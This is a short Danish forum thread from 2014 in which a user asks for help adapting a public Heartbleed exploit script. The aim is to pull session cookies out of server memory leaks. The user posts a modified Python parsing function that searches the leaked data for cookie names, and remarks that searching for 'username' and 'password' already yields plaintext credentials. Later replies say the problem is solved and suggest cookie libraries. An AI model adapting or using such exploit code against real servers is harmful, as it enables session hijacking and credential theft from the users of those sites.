Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
[Hjælp] Heartbleed Exploit Script #2
27-04-2014, 17:01
#1
[Hjælp] Heartbleed Exploit Script #2
Yo. (Samme tråd som på HF)....

Har brug for lidt hjælp til at gøre dette script lidt mere brugbart:
https://gist.github.com/mpdavis/10171593

Er der nogle garvede Python scriptere der kan gennemskue hvordan jeg tilføjer ekstra cookie-navne, som så kan vises i sammenhæng med den første?

Som det ser ud nu, har jeg ændret følgende:
Kode:
def parse_response(self):
        """
        Parses the response from the server for a session id.
        """
        ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)
        index = string.find(ascii, '__utmz') & string.find(ascii, '__utma')
        if index >= 0:
            info = ascii[index:index + self.cookie_length]
            session = info.split(' ')[0]
            
            
            if session not in self.found_sessions:
                self.found_sessions.add(session)
                print session

Dette leder efter begge værdier i samme stræng, og virker kun ved f. eks. 'username' og 'password' - da de 2 er 2 forskellige cookie-navne/overskifter. Har også prøvet med 'cookie' for at få den samlede cookie, hvilket ikke giver resultater overhovedet.

Det er jo egentlig fint nok, at jeg ved at skifte til username + password får plaintext credentials, men nu er det altså cookies jeg prøver at opstøve.

:/
Find alle beskeder fra denne bruger
Citer denne besked i et svar
28-04-2014, 23:24
#2
RE: [Hjælp] Heartbleed Exploit Script #2
Har selv fået det fikset nu. ;)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
12-11-2014, 20:27
#3
RE: [Hjælp] Heartbleed Exploit Script #2
Hvis du fisker efter cookies igennem http, ville jeg kigge på dokumentationen omkring "requests" librariet, eller CookieJar.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)